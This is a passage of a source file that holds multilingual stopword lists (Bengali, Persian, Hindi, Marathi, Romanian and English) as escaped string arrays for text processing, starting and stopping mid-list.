\"অনেক\",\n        \"অন্য\",\n        \"অবশ্য\",\n        \"আগে\",\n        \"আছে\",\n        \"আজ\",\n        \"আবার\",\n        \"আমরা\",\n        \"আমাদের\",\n        \"আর\",\n        \"ই\",\n        \"উত্তর\",\n        
\"উপর\",\n        \"উপরে\",\n        \"এ\",\n        \"এই\",\n        \"এক্\",\n        \"এখন\",\n        \"এত\",\n        \"এব\",\n        \"এমন\",\n        \"এমনি\",\n        \"এর\",\n        \"এস\",\n        \"এসে\",\n        \"ও\",\n        \"ওই\",\n        \"কমনে\",\n        \"করা\",\n        \"করে\",\n        \"কাছে\",\n        \"কাজ\",\n        \"কাজে\",\n        \"কারণ\",\n        \"কি\",\n        \"কিছু\",\n        \"কে\",\n        \"কেউ\",\n        \"কেখা\",\n        \"কেন\",\n        \"কোটি\",\n        \"কোনো\",\n        \"কয়েক\",\n        \"খুব\",\n        \"গিয়ে\",\n        \"গেল\",\n        \"চার\",\n        \"চালু\",\n        \"চেষ্টা\",\n        \"ছিল\",\n        \"জানা\",\n        \"জ্নজন\",\n        \"টি\",\n        \"তখন\",\n        \"তবে\",\n        \"তা\",\n        \"তাই\",\n        \"তো\",\n        \"থাকা\",\n        \"থেকে\",\n        \"দিন\",\n        \"দু\",\n        \"দুই\",\n        \"দেওয়া\",\n        \"ধামার\",\n        \"নতুন\",\n        \"না\",\n        \"নাগাদ\",\n        \"নিয়ে\",\n        \"নেওয়া\",\n        \"নয়\",\n        \"পর\",\n        \"পরে\",\n        \"পাচ\",\n        \"পি\",\n        \"পেয়্র্\",\n        \"প্রতি\",\n        \"প্রথম\",\n        \"প্রযন্ত\",\n        \"প্রাথমিক\",\n        \"প্রায়\",\n        \"বক্তব্য\",\n        \"বন\",\n        \"বলা\",\n        \"বলে\",\n        \"বলেন\",\n        \"বহু\",\n        \"বা\",\n        \"বি\",\n        \"বিভিন্ন\",\n        \"বেশ\",\n        \"বেশি\",\n        \"মতো\",\n        \"মধ্যে\",\n        \"মনে\",\n        \"যখন\",\n        \"যদি\",\n        \"যা\",\n        \"যাওয়া\",\n        \"যে\",\n        \"র\",\n        \"রকম\",\n        \"লক্ষ\",\n        \"শুধু\",\n        \"শুরু\",\n        \"সঙ্গে\",\n        \"সব\",\n        \"সহ\",\n        \"সাধারণ\",\n        \"সামনে\",\n        \"সি\",\n        \"সে\",\n        \"সেই\",\n        \"হতে\",\n        \"হাজার\",\n        \"হয়\",\n    ],\n    \"fa\": [\n        \"آباد\",\n        \"آره\",\n        \"آری\",\n        
\"آمد\",\n        \"آمده\",\n        \"آن\",\n        \"آنان\",\n        \"آنجا\",\n        \"آنكه\",\n        \"آنها\",\n        \"آنچه\",\n        \"آورد\",\n        \"آورده\",\n        \"آيد\",\n        \"آیا\",\n        \"اثرِ\",\n        \"از\",\n        \"است\",\n        \"استفاده\",\n        \"اش\",\n        \"اكنون\",\n        \"البته\",\n        \"البتّه\",\n        \"ام\",\n        \"اما\",\n        \"امروز\",\n        \"امسال\",\n        \"اند\",\n        \"انکه\",\n        \"او\",\n        \"اول\",\n        \"اي\",\n        \"ايشان\",\n        \"ايم\",\n        \"اين\",\n        \"اينكه\",\n        \"اگر\",\n        \"با\",\n        \"بار\",\n        \"بارة\",\n        \"باره\",\n        \"باشد\",\n        \"باشند\",\n        \"باشيم\",\n        \"بالا\",\n        \"بالایِ\",\n        \"بايد\",\n        \"بدون\",\n        \"بر\",\n        \"برابرِ\",\n        \"براساس\",\n        \"براي\",\n        \"برایِ\",\n        \"برخوردار\",\n        \"برخي\",\n        \"برداري\",\n        \"بروز\",\n        \"بسيار\",\n        \"بسياري\",\n        \"بعد\",\n        \"بعری\",\n        \"بعضي\",\n        \"بلكه\",\n        \"بله\",\n        \"بلکه\",\n        \"بلی\",\n        \"بنابراين\",\n        \"بندي\",\n        \"به\",\n        \"بهترين\",\n        \"بود\",\n        \"بودن\",\n        \"بودند\",\n        \"بوده\",\n        \"بي\",\n        \"بيست\",\n        \"بيش\",\n        \"بيشتر\",\n        \"بيشتري\",\n        \"بين\",\n        \"بی\",\n        \"بیرونِ\",\n        \"تا\",\n        \"تازه\",\n        \"تاكنون\",\n        \"تان\",\n        \"تحت\",\n        \"تر\",\n        \"ترين\",\n        \"تمام\",\n        \"تمامي\",\n        \"تنها\",\n        \"تواند\",\n        \"توانند\",\n        \"توسط\",\n        \"تولِ\",\n        \"تویِ\",\n        \"جا\",\n        \"جاي\",\n        \"جايي\",\n        \"جدا\",\n        \"جديد\",\n        \"جريان\",\n        \"جز\",\n        \"جلوگيري\",\n        \"جلویِ\",\n        \"حتي\",\n        \"حدودِ\",\n        
\"حق\",\n        \"خارجِ\",\n        \"خدمات\",\n        \"خواست\",\n        \"خواهد\",\n        \"خواهند\",\n        \"خواهيم\",\n        \"خود\",\n        \"خويش\",\n        \"خیاه\",\n        \"داد\",\n        \"دادن\",\n        \"دادند\",\n        \"داده\",\n        \"دارد\",\n        \"دارند\",\n        \"داريم\",\n        \"داشت\",\n        \"داشتن\",\n        \"داشتند\",\n        \"داشته\",\n        \"دانست\",\n        \"دانند\",\n        \"در\",\n        \"درباره\",\n        \"دنبالِ\",\n        \"ده\",\n        \"دهد\",\n        \"دهند\",\n        \"دو\",\n        \"دوم\",\n        \"ديده\",\n        \"ديروز\",\n        \"ديگر\",\n        \"ديگران\",\n        \"ديگري\",\n        \"دیگر\",\n        \"را\",\n        \"راه\",\n        \"رفت\",\n        \"رفته\",\n        \"روب\",\n        \"روزهاي\",\n        \"روي\",\n        \"رویِ\",\n        \"ريزي\",\n        \"زياد\",\n        \"زير\",\n        \"زيرا\",\n        \"زیرِ\",\n        \"سابق\",\n        \"ساخته\",\n        \"سازي\",\n        \"سراسر\",\n        \"سریِ\",\n        \"سعي\",\n        \"سمتِ\",\n        \"سوم\",\n        \"سوي\",\n        \"سویِ\",\n        \"سپس\",\n        \"شان\",\n        \"شايد\",\n        \"شد\",\n        \"شدن\",\n        \"شدند\",\n        \"شده\",\n        \"شش\",\n        \"شما\",\n        \"شناسي\",\n        \"شود\",\n        \"شوند\",\n        \"صورت\",\n        \"ضدِّ\",\n        \"ضمن\",\n        \"طبقِ\",\n        \"طريق\",\n        \"طور\",\n        \"طي\",\n        \"عقبِ\",\n        \"علّتِ\",\n        \"عنوانِ\",\n        \"غير\",\n        \"فقط\",\n        \"فكر\",\n        \"فوق\",\n        \"قابل\",\n        \"قبل\",\n        \"قصدِ\",\n        \"كرد\",\n        \"كردم\",\n        \"كردن\",\n        \"كردند\",\n        \"كرده\",\n        \"كسي\",\n        \"كل\",\n        \"كمتر\",\n        \"كند\",\n        \"كنم\",\n        \"كنند\",\n        \"كنيد\",\n        \"كنيم\",\n        \"كه\",\n        \"لطفاً\",\n        \"ما\",\n        \"مان\",\n        
\"مانند\",\n        \"مانندِ\",\n        \"مثل\",\n        \"مثلِ\",\n        \"مختلف\",\n        \"مدّتی\",\n        \"مردم\",\n        \"مرسی\",\n        \"مقابل\",\n        \"من\",\n        \"مورد\",\n        \"مي\",\n        \"ميليارد\",\n        \"ميليون\",\n        \"مگر\",\n        \"ناشي\",\n        \"نام\",\n        \"نبايد\",\n        \"نبود\",\n        \"نخست\",\n        \"نخستين\",\n        \"نخواهد\",\n        \"ندارد\",\n        \"ندارند\",\n        \"نداشته\",\n        \"نزديك\",\n        \"نزدِ\",\n        \"نزدیکِ\",\n        \"نشان\",\n        \"نشده\",\n        \"نظير\",\n        \"نكرده\",\n        \"نمايد\",\n        \"نمي\",\n        \"نه\",\n        \"نوعي\",\n        \"نيز\",\n        \"نيست\",\n        \"ها\",\n        \"هاي\",\n        \"هايي\",\n        \"هر\",\n        \"هرگز\",\n        \"هزار\",\n        \"هست\",\n        \"هستند\",\n        \"هستيم\",\n        \"هفت\",\n        \"هم\",\n        \"همان\",\n        \"همه\",\n        \"همواره\",\n        \"همين\",\n        \"همچنان\",\n        \"همچنين\",\n        \"همچون\",\n        \"همین\",\n        \"هنوز\",\n        \"هنگام\",\n        \"هنگامِ\",\n        \"هنگامی\",\n        \"هيچ\",\n        \"هیچ\",\n        \"و\",\n        \"وسطِ\",\n        \"وقتي\",\n        \"وقتیکه\",\n        \"ولی\",\n        \"وي\",\n        \"وگو\",\n        \"يا\",\n        \"يابد\",\n        \"يك\",\n        \"يكديگر\",\n        \"يكي\",\n        \"ّه\",\n        \"پاعینِ\",\n        \"پس\",\n        \"پنج\",\n        \"پيش\",\n        \"پیش\",\n        \"پیشِ\",\n        \"چرا\",\n        \"چطور\",\n        \"چند\",\n        \"چندین\",\n        \"چنين\",\n        \"چه\",\n        \"چهار\",\n        \"چون\",\n        \"چيزي\",\n        \"چگونه\",\n        \"چیز\",\n        \"چیزی\",\n        \"چیست\",\n        \"کجا\",\n        \"کجاست\",\n        \"کدام\",\n        \"کس\",\n        \"کسی\",\n        \"کنارِ\",\n        \"که\",\n        \"کَی\",\n        \"کی\",\n        \"گذاري\",\n        
\"گذاشته\",\n        \"گردد\",\n        \"گرفت\",\n        \"گرفته\",\n        \"گروهي\",\n        \"گفت\",\n        \"گفته\",\n        \"گويد\",\n        \"گويند\",\n        \"گيرد\",\n        \"گيري\",\n        \"یا\",\n        \"یک\",\n    ],\n    \"hi\": [\n        \"अंदर\",\n        \"अत\",\n        \"अदि\",\n        \"अप\",\n        \"अपना\",\n        \"अपनि\",\n        \"अपनी\",\n        \"अपने\",\n        \"अभि\",\n        \"अभी\",\n        \"आदि\",\n        \"आप\",\n        \"इंहिं\",\n        \"इंहें\",\n        \"इंहों\",\n        \"इतयादि\",\n        \"इत्यादि\",\n        \"इन\",\n        \"इनका\",\n        \"इन्हीं\",\n        \"इन्हें\",\n        \"इन्हों\",\n        \"इस\",\n        \"इसका\",\n        \"इसकि\",\n        \"इसकी\",\n        \"इसके\",\n        \"इसमें\",\n        \"इसि\",\n        \"इसी\",\n        \"इसे\",\n        \"उंहिं\",\n        \"उंहें\",\n        \"उंहों\",\n        \"उन\",\n        \"उनका\",\n        \"उनकि\",\n        \"उनकी\",\n        \"उनके\",\n        \"उनको\",\n        \"उन्हीं\",\n        \"उन्हें\",\n        \"उन्हों\",\n        \"उस\",\n        \"उसके\",\n        \"उसि\",\n        \"उसी\",\n        \"उसे\",\n        \"एक\",\n        \"एवं\",\n        \"एस\",\n        \"एसे\",\n        \"ऐसे\",\n        \"ओर\",\n        \"और\",\n        \"कइ\",\n        \"कई\",\n        \"कर\",\n        \"करता\",\n        \"करते\",\n        \"करना\",\n        \"करने\",\n        \"करें\",\n        \"कहते\",\n        \"कहा\",\n        \"का\",\n        \"काफि\",\n        \"काफ़ी\",\n        \"कि\",\n        \"किंहें\",\n        \"किंहों\",\n        \"कितना\",\n        \"किन्हें\",\n        \"किन्हों\",\n        \"किया\",\n        \"किर\",\n        \"किस\",\n        \"किसि\",\n        \"किसी\",\n        \"किसे\",\n        \"की\",\n        \"कुछ\",\n        \"कुल\",\n        \"के\",\n        \"को\",\n        \"कोइ\",\n        \"कोई\",\n        \"कोन\",\n        \"कोनसा\",\n        \"कौन\",\n        \"कौनसा\",\n        \"गया\",\n        
\"घर\",\n        \"जब\",\n        \"जहाँ\",\n        \"जहां\",\n        \"जा\",\n        \"जिंहें\",\n        \"जिंहों\",\n        \"जितना\",\n        \"जिधर\",\n        \"जिन\",\n        \"जिन्हें\",\n        \"जिन्हों\",\n        \"जिस\",\n        \"जिसे\",\n        \"जीधर\",\n        \"जेसा\",\n        \"जेसे\",\n        \"जैसा\",\n        \"जैसे\",\n        \"जो\",\n        \"तक\",\n        \"तब\",\n        \"तरह\",\n        \"तिंहें\",\n        \"तिंहों\",\n        \"तिन\",\n        \"तिन्हें\",\n        \"तिन्हों\",\n        \"तिस\",\n        \"तिसे\",\n        \"तो\",\n        \"था\",\n        \"थि\",\n        \"थी\",\n        \"थे\",\n        \"दबारा\",\n        \"दवारा\",\n        \"दिया\",\n        \"दुसरा\",\n        \"दुसरे\",\n        \"दूसरे\",\n        \"दो\",\n        \"द्वारा\",\n        \"न\",\n        \"नहिं\",\n        \"नहीं\",\n        \"ना\",\n        \"निचे\",\n        \"निहायत\",\n        \"नीचे\",\n        \"ने\",\n        \"पर\",\n        \"पहले\",\n        \"पुरा\",\n        \"पूरा\",\n        \"पे\",\n        \"फिर\",\n        \"बनि\",\n        \"बनी\",\n        \"बहि\",\n        \"बही\",\n        \"बहुत\",\n        \"बाद\",\n        \"बाला\",\n        \"बिलकुल\",\n        \"भि\",\n        \"भितर\",\n        \"भी\",\n        \"भीतर\",\n        \"मगर\",\n        \"मानो\",\n        \"मे\",\n        \"में\",\n        \"यदि\",\n        \"यह\",\n        \"यहाँ\",\n        \"यहां\",\n        \"यहि\",\n        \"यही\",\n        \"या\",\n        \"यिह\",\n        \"ये\",\n        \"रखें\",\n        \"रवासा\",\n        \"रहा\",\n        \"रहे\",\n        \"ऱ्वासा\",\n        \"लिए\",\n        \"लिये\",\n        \"लेकिन\",\n        \"व\",\n        \"वगेरह\",\n        \"वरग\",\n        \"वर्ग\",\n        \"वह\",\n        \"वहाँ\",\n        \"वहां\",\n        \"वहिं\",\n        \"वहीं\",\n        \"वाले\",\n        \"वुह\",\n        \"वे\",\n        \"वग़ैरह\",\n        \"संग\",\n        \"सकता\",\n        \"सकते\",\n        \"सबसे\",\n        
\"सभि\",\n        \"सभी\",\n        \"साथ\",\n        \"साबुत\",\n        \"साभ\",\n        \"सारा\",\n        \"से\",\n        \"सो\",\n        \"हि\",\n        \"ही\",\n        \"हुअ\",\n        \"हुआ\",\n        \"हुइ\",\n        \"हुई\",\n        \"हुए\",\n        \"हे\",\n        \"हें\",\n        \"है\",\n        \"हैं\",\n        \"हो\",\n        \"होता\",\n        \"होति\",\n        \"होती\",\n        \"होते\",\n        \"होना\",\n        \"होने\",\n    ],\n    \"mr\": [\n        \"अधिक\",\n        \"अनेक\",\n        \"अशी\",\n        \"असलयाचे\",\n        \"असलेल्या\",\n        \"असा\",\n        \"असून\",\n        \"असे\",\n        \"आज\",\n        \"आणि\",\n        \"आता\",\n        \"आपल्या\",\n        \"आला\",\n        \"आली\",\n        \"आले\",\n        \"आहे\",\n        \"आहेत\",\n        \"एक\",\n        \"एका\",\n        \"कमी\",\n        \"करणयात\",\n        \"करून\",\n        \"का\",\n        \"काम\",\n        \"काय\",\n        \"काही\",\n        \"किवा\",\n        \"की\",\n        \"केला\",\n        \"केली\",\n        \"केले\",\n        \"कोटी\",\n        \"गेल्या\",\n        \"घेऊन\",\n        \"जात\",\n        \"झाला\",\n        \"झाली\",\n        \"झाले\",\n        \"झालेल्या\",\n        \"टा\",\n        \"डॉ\",\n        \"तर\",\n        \"तरी\",\n        \"तसेच\",\n        \"ता\",\n        \"ती\",\n        \"तीन\",\n        \"ते\",\n        \"तो\",\n        \"त्या\",\n        \"त्याचा\",\n        \"त्याची\",\n        \"त्याच्या\",\n        \"त्याना\",\n        \"त्यानी\",\n        \"त्यामुळे\",\n        \"त्री\",\n        \"दिली\",\n        \"दोन\",\n        \"न\",\n        \"नाही\",\n        \"निर्ण्य\",\n        \"पण\",\n        \"पम\",\n        \"परयतन\",\n        \"पाटील\",\n        \"म\",\n        \"मात्र\",\n        \"माहिती\",\n        \"मी\",\n        \"मुबी\",\n        \"म्हणजे\",\n        \"म्हणाले\",\n        \"म्हणून\",\n        \"या\",\n        \"याचा\",\n        \"याची\",\n        \"याच्या\",\n        \"याना\",\n        
\"यानी\",\n        \"येणार\",\n        \"येत\",\n        \"येथील\",\n        \"येथे\",\n        \"लाख\",\n        \"व\",\n        \"व्यकत\",\n        \"सर्व\",\n        \"सागित्ले\",\n        \"सुरू\",\n        \"हजार\",\n        \"हा\",\n        \"ही\",\n        \"हे\",\n        \"होणार\",\n        \"होत\",\n        \"होता\",\n        \"होती\",\n        \"होते\",\n    ],\n    \"ro\": [\n        \"acea\",\n        \"aceasta\",\n        \"această\",\n        \"aceea\",\n        \"acei\",\n        \"aceia\",\n        \"acel\",\n        \"acela\",\n        \"acele\",\n        \"acelea\",\n        \"acest\",\n        \"acesta\",\n        \"aceste\",\n        \"acestea\",\n        \"aceşti\",\n        \"aceştia\",\n        \"acolo\",\n        \"acord\",\n        \"acum\",\n        \"ai\",\n        \"aia\",\n        \"aibă\",\n        \"aici\",\n        \"al\",\n        \"ale\",\n        \"alea\",\n        \"altceva\",\n        \"altcineva\",\n        \"am\",\n        \"ar\",\n        \"are\",\n        \"asemenea\",\n        \"asta\",\n        \"astea\",\n        \"astăzi\",\n        \"asupra\",\n        \"au\",\n        \"avea\",\n        \"avem\",\n        \"aveţi\",\n        \"azi\",\n        \"aş\",\n        \"aşadar\",\n        \"aţi\",\n        \"bine\",\n        \"bucur\",\n        \"bună\",\n        \"ca\",\n        \"care\",\n        \"caut\",\n        \"ce\",\n        \"cel\",\n        \"ceva\",\n        \"chiar\",\n        \"cinci\",\n        \"cine\",\n        \"cineva\",\n        \"contra\",\n        \"cu\",\n        \"cum\",\n        \"cumva\",\n        \"curând\",\n        \"curînd\",\n        \"când\",\n        \"cât\",\n        \"câte\",\n        \"câtva\",\n        \"câţi\",\n        \"cînd\",\n        \"cît\",\n        \"cîte\",\n        \"cîtva\",\n        \"cîţi\",\n        \"că\",\n        \"căci\",\n        \"cărei\",\n        \"căror\",\n        \"cărui\",\n        \"către\",\n        \"da\",\n        \"dacă\",\n        \"dar\",\n        
\"datorită\",\n        \"dată\",\n        \"dau\",\n        \"de\",\n        \"deci\",\n        \"deja\",\n        \"deoarece\",\n        \"departe\",\n        \"deşi\",\n        \"din\",\n        \"dinaintea\",\n        \"dintr-\",\n        \"dintre\",\n        \"doi\",\n        \"doilea\",\n        \"două\",\n        \"drept\",\n        \"după\",\n        \"dă\",\n        \"ea\",\n        \"ei\",\n        \"el\",\n        \"ele\",\n        \"eram\",\n        \"este\",\n        \"eu\",\n        \"eşti\",\n        \"face\",\n        \"fata\",\n        \"fi\",\n        \"fie\",\n        \"fiecare\",\n        \"fii\",\n        \"fim\",\n        \"fiu\",\n        \"fiţi\",\n        \"frumos\",\n        \"fără\",\n        \"graţie\",\n        \"halbă\",\n        \"iar\",\n        \"ieri\",\n        \"la\",\n        \"le\",\n        \"li\",\n        \"lor\",\n        \"lui\",\n        \"lângă\",\n        \"lîngă\",\n        \"mai\",\n        \"mea\",\n        \"mei\",\n        \"mele\",\n        \"mereu\",\n        \"meu\",\n        \"mi\",\n        \"mie\",\n        \"mine\",\n        \"mult\",\n        \"multă\",\n        \"mulţi\",\n        \"mulţumesc\",\n        \"mâine\",\n        \"mîine\",\n        \"mă\",\n        \"ne\",\n        \"nevoie\",\n        \"nici\",\n        \"nicăieri\",\n        \"nimeni\",\n        \"nimeri\",\n        \"nimic\",\n        \"nişte\",\n        \"noastre\",\n        \"noastră\",\n        \"noi\",\n        \"noroc\",\n        \"nostru\",\n        \"nouă\",\n        \"noştri\",\n        \"nu\",\n        \"opt\",\n        \"ori\",\n        \"oricare\",\n        \"orice\",\n        \"oricine\",\n        \"oricum\",\n        \"oricând\",\n        \"oricât\",\n        \"oricînd\",\n        \"oricît\",\n        \"oriunde\",\n        \"patra\",\n        \"patru\",\n        \"patrulea\",\n        \"pe\",\n        \"pentru\",\n        \"peste\",\n        \"pic\",\n        \"poate\",\n        \"pot\",\n        \"prea\",\n        \"prima\",\n   
     \"primul\",\n        \"prin\",\n        \"printr-\",\n        \"puţin\",\n        \"puţina\",\n        \"puţină\",\n        \"până\",\n        \"pînă\",\n        \"rog\",\n        \"sa\",\n        \"sale\",\n        \"sau\",\n        \"se\",\n        \"spate\",\n        \"spre\",\n        \"sub\",\n        \"sunt\",\n        \"suntem\",\n        \"sunteţi\",\n        \"sută\",\n        \"sînt\",\n        \"sîntem\",\n        \"sînteţi\",\n        \"să\",\n        \"săi\",\n        \"său\",\n        \"ta\",\n        \"tale\",\n        \"te\",\n        \"timp\",\n        \"tine\",\n        \"toate\",\n        \"toată\",\n        \"tot\",\n        \"totuşi\",\n        \"toţi\",\n        \"trei\",\n        \"treia\",\n        \"treilea\",\n        \"tu\",\n        \"tăi\",\n        \"tău\",\n        \"un\",\n        \"una\",\n        \"unde\",\n        \"undeva\",\n        \"unei\",\n        \"uneia\",\n        \"unele\",\n        \"uneori\",\n        \"unii\",\n        \"unor\",\n        \"unora\",\n        \"unu\",\n        \"unui\",\n        \"unuia\",\n        \"unul\",\n        \"vi\",\n        \"voastre\",\n        \"voastră\",\n        \"voi\",\n        \"vostru\",\n        \"vouă\",\n        \"voştri\",\n        \"vreme\",\n        \"vreo\",\n        \"vreun\",\n        \"vă\",\n        \"zece\",\n        \"zero\",\n        \"zi\",\n        \"zice\",\n        \"îi\",\n        \"îl\",\n        \"îmi\",\n        \"împotriva\",\n        \"în\",\n        \"înainte\",\n        \"înaintea\",\n        \"încotro\",\n        \"încât\",\n        \"încît\",\n        \"între\",\n        \"întrucât\",\n        \"întrucît\",\n        \"îţi\",\n        \"ăla\",\n        \"ălea\",\n        \"ăsta\",\n        \"ăstea\",\n        \"ăştia\",\n        \"şapte\",\n        \"şase\",\n        \"şi\",\n        \"ştiu\",\n        \"ţi\",\n        \"ţie\",\n    ],\n    \"en\": [\n        \"a\",\n        \"a's\",\n        \"able\",\n        \"about\",\n        \"above\",\n        
\"according\",\n        \"accordingly\",\n        \"across\",\n        \"actually\",\n        \"after\",\n        \"afterwards\",\n        \"again\",\n        \"against\",\n        \"ain't\",\n        \"all\",\n        \"allow\",\n        \"allows\",\n        \"almost\",\n        \"alone\",\n        \"along\",\n        \"already\",\n        \"also\",\n        \"although\",\n        \"always\",\n        \"am\",\n        \"among\",\n        \"amongst\",\n        \"an\",\n        \"and\",\n        \"another\",\n        \"any\",\n        \"anybody\",\n        \"anyhow\",\n        \"anyone\",\n        \"anything\",\n        \"anyway\",\n        \"anyways\",\n        \"anywhere\",\n        \"apart\",\n        \"appear\",\n        \"appreciate\",\n        \"appropriate\",\n        \"are\",\n        \"aren't\",\n        \"around\",\n        \"as\",\n        \"aside\",\n        \"ask\",\n        \"asking\",\n        \"associated\",\n        \"at\",\n        \"available\",\n        \"away\",\n        \"awfully\",\n        \"b\",\n        \"be\",\n        \"became\",\n        \"because\",\n        \"become\",\n        \"becomes\",\n        \"becoming\",\n        \"been\",\n        \"before\",\n        \"beforehand\",\n        \"behind\",\n        \"being\",\n        \"believe\",\n        \"below\",\n        \"beside\",\n        \"besides\",\n        \"best\",\n        \"better\",\n        \"between\",\n        \"beyond\",\n        \"both\",\n        \"brief\",\n        \"but\",\n        \"by\",\n        \"c\",\n        \"c'mon\",\n        \"c's\",\n        \"came\",\n        \"can\",\n        \"can't\",\n        \"cannot\",\n        \"cant\",\n        \"cause\",\n        \"causes\",\n        \"certain\",\n        \"certainly\",\n        \"changes\",\n        \"clearly\",\n        \"co\",\n        \"com\",\n        \"come\",\n        \"comes\",\n        \"concerning\",\n        \"consequently\",\n        \"consider\",\n        \"considering\",\n        \"contain\",\n        
\"containing\",\n        \"contains\",\n        \"corresponding\",\n        \"could\",\n        \"couldn't\",\n        \"course\",\n        \"currently\",\n        \"d\",\n        \"definitely\",\n        \"described\",\n        \"despite\",\n        \"did\",\n        \"didn't\",\n        \"different\",\n        \"do\",\n        \"does\",\n        \"doesn't\",\n        \"doing\",\n        \"don't\",\n        \"done\",\n        \"down\",\n        \"downwards\",\n        \"during\",\n        \"e\",\n        \"each\",\n        \"edu\",\n        \"eg\",\n        \"eight\",\n        \"either\",\n        \"else\",\n        \"elsewhere\",\n        \"enough\",\n        \"entirely\",\n        \"especially\",\n        \"et\",\n        \"etc\",\n        \"even\",\n        \"ever\",\n        \"every\",\n        \"everybody\",\n        \"everyone\",\n        \"everything\",\n        \"everywhere\",\n        \"ex\",\n        \"exactly\",\n        \"example\",\n        \"except\",\n        \"f\",\n        \"far\",\n        \"few\",\n        \"fifth\",\n        \"first\",\n        \"five\",\n        \"followed\",\n        \"following\",\n        \"follows\",\n        \"for\",\n        \"former\",\n        \"formerly\",\n        \"forth\",\n        \"four\",\n        \"from\",\n        \"further\",\n        \"furthermore\",\n        \"g\",\n        \"get\",\n        \"gets\",\n        \"getting\",\n        \"given\",\n        \"gives\",\n        \"go\",\n        \"goes\",\n        \"going\",\n        \"gone\",\n        \"got\",\n        \"gotten\",\n        \"greetings\",\n        \"h\",\n        \"had\",\n        \"hadn't\",\n        \"happens\",\n        \"hardly\",\n        \"has\",\n        \"hasn't\",\n        \"have\",\n        \"haven't\",\n        \"having\",\n        \"he\",\n        \"he's\",\n        \"hello\",\n        \"help\",\n        \"hence\",\n        \"her\",\n        \"here\",\n        \"here's\",\n        \"hereafter\",\n        \"hereby\",\n        
\"herein\",\n        \"hereupon\",\n        \"hers\",\n        \"herself\",\n        \"hi\",\n        \"him\",\n        \"himself\",\n        \"his\",\n        \"hither\",\n        \"hopefully\",\n        \"how\",\n        \"howbeit\",\n        \"however\",\n        \"i\",\n        \"i'd\",\n        \"i'll\",\n        \"i'm\",\n        \"i've\",\n        \"ie\",\n        \"if\",\n        \"ignored\",\n        \"immediate\",\n        \"in\",\n        \"inasmuch\",\n        \"inc\",\n        \"indeed\",\n        \"indicate\",\n        \"indicated\",\n        \"indicates\",\n        \"inner\",\n        \"insofar\",\n        \"instead\",\n        \"into\",\n        \"inward\",\n        \"is\",\n        \"isn't\",\n        \"it\",\n        \"it'd\",\n        \"it'll\",\n        \"it's\",\n        \"its\",\n        \"itself\",\n        \"j\",\n        \"just\",\n        \"k\",\n        \"keep\",\n        \"keeps\",\n        \"kept\",\n        \"know\",\n        \"known\",\n        \"knows\",\n        \"l\",\n        \"last\",\n        \"lately\",\n        \"later\",\n        \"latter\",\n        \"latterly\",\n        \"least\",\n        \"less\",\n        \"lest\",\n        \"let\",\n        \"let's\",\n        \"like\",\n        \"liked\",\n        \"likely\",\n        \"little\",\n        \"look\",\n        \"looking\",\n        \"looks\",\n        \"ltd\",\n        \"m\",\n        \"mainly\",\n        \"many\",\n        \"may\",\n        \"maybe\",\n        \"me\",\n        \"mean\",\n        \"meanwhile\",\n        \"merely\",\n        \"might\",\n        \"more\",\n        \"moreover\",\n        \"most\",\n        \"mostly\",\n        \"much\",\n        \"must\",\n        \"my\",\n        \"myself\",\n        \"n\",\n        \"name\",\n        \"namely\",\n        \"nd\",\n        \"near\",\n        \"nearly\",\n        \"necessary\",\n        \"need\",\n        \"needs\",\n        \"neither\",\n        \"never\",\n        \"nevertheless\",\n        \"new\",\n      
  \"next\",\n        \"nine\",\n        \"no\",\n        \"nobody\",\n        \"non\",\n        \"none\",\n        \"noone\",\n        \"nor\",\n        \"normally\",\n        \"not\",\n        \"nothing\",\n        \"novel\",\n        \"now\",\n        \"nowhere\",\n        \"o\",\n        \"obviously\",\n        \"of\",\n        \"off\",\n        \"often\",\n        \"oh\",\n        \"ok\",\n        \"okay\",\n        \"old\",\n        \"on\",\n        \"once\",\n        \"one\",\n        \"ones\",\n        \"only\",\n        \"onto\",\n        \"or\",\n        \"other\",\n        \"others\",\n        \"otherwise\",\n        \"ought\",\n        \"our\",\n        \"ours\",\n        \"ourselves\",\n        \"out\",\n        \"outside\",\n        \"over\",\n        \"overall\",\n        \"own\",\n        \"p\",\n        \"particular\",\n        \"particularly\",\n        \"per\",\n        \"perhaps\",\n        \"placed\",\n        \"please\",\n        \"plus\",\n        \"possible\",\n        \"presumably\",\n        \"probably\",\n        \"provides\",\n        \"q\",\n        \"que\",\n        \"quite\",\n        \"qv\",\n        \"r\",\n        \"rather\",\n        \"rd\",\n        \"re\",\n        \"really\",\n        \"reasonably\",\n        \"regarding\",\n        \"regardless\",\n        \"regards\",\n        \"relatively\",\n        \"respectively\",\n        \"right\",\n        \"s\",\n        \"said\",\n        \"same\",\n        \"saw\",\n        \"say\",\n        \"saying\",\n        \"says\",\n        \"second\",\n        \"secondly\",\n        \"see\",\n        \"seeing\",\n        \"seem\",\n        \"seemed\",\n        \"seeming\",\n        \"seems\",\n        \"seen\",\n        \"self\",\n        \"selves\",\n        \"sensible\",\n        \"sent\",\n        \"serious\",\n        \"seriously\",\n        \"seven\",\n        \"several\",\n        \"shall\",\n        \"she\",\n        \"should\",\n        \"shouldn't\",\n        \"since\",\n        
\"six\",\n        \"so\",\n        \"some\",\n        \"somebody\",\n        \"somehow\",\n        \"someone\",\n        \"something\",\n        \"sometime\",\n        \"sometimes\",\n        \"somewhat\",\n        \"somewhere\",\n        \"soon\",\n        \"sorry\",\n        \"specified\",\n        \"specify\",\n        \"specifying\",\n        \"still\",\n        \"sub\",\n        \"such\",\n        \"sup\",\n        \"sure\",\n        \"t\",\n        \"t's\",\n        \"take\",\n        \"taken\",\n        \"tell\",\n        \"tends\",\n        \"th\",\n        \"than\",\n        \"thank\",\n        \"thanks\",\n        \"thanx\",\n        \"that\",\n        \"that's\",\n        \"thats\",\n        \"the\",\n        \"their\",\n        \"theirs\",\n        \"them\",\n        \"themselves\",\n        \"then\",\n        \"thence\",\n        \"there\",\n        \"there's\",\n        \"thereafter\",\n        \"thereby\",\n        \"therefore\",\n        \"therein\",\n        \"theres\",\n        \"thereupon\",\n        \"these\",\n        \"they\",\n        \"they'd\",\n        \"they'll\",\n        \"they're\",\n        \"they've\",\n        \"think\",\n        \"third\",\n        \"this\",\n        \"thorough\",\n        \"thoroughly\",\n        \"those\",\n        \"though\",\n        \"three\",\n        \"through\",\n        \"throughout\",\n        \"thru\",\n        \"thus\",\n        \"to\",\n        \"together\",\n        \"too\",\n        \"took\",\n        \"toward\",\n        \"towards\",\n        \"tried\",\n        \"tries\",\n        \"truly\",\n        \"try\",\n        \"trying\",\n        \"twice\",\n        \"two\",\n        \"u\",\n        \"un\",\n        \"under\",\n        \"unfortunately\",\n        \"unless\",\n        